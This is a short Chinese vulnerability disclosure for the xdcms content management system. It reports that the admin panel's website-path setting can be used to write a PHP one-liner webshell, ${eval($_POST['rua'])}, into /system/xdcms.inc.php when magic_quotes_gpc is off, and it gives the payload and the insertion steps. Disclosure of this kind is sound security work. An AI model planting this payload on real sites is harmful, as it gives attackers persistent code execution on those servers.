### 简要描述:
xdcms后台网站配置基本信息的网站路径处过滤不严,仍可以插一句话拿shell。
前提 magic_quotes_gpc=Off
### 详细说明:
[<img src="https://images.seebug.org/upload/201312/21140206b73f1e2d75f271aea9d6ced22158e006.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/21140206b73f1e2d75f271aea9d6ced22158e006.jpg)
1.进后台,在基本信息中的网站路径处添加一句话,因为尖括号被转码,但是可以添加花括号型的一句话,${eval($_POST['rua'])}。
[<img src="https://images.seebug.org/upload/201312/21140436114ad2ec38c6ab4b65c787637e0810ce.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/21140436114ad2ec38c6ab4b65c787637e0810ce.jpg)
2.一句话写入在/system/xdcms.inc.php中。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201312/21140642fe0f64ae239f8c184f034769e2d52367.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/21140642fe0f64ae239f8c184f034769e2d52367.jpg)
京公网安备 11010502034610号
暂无评论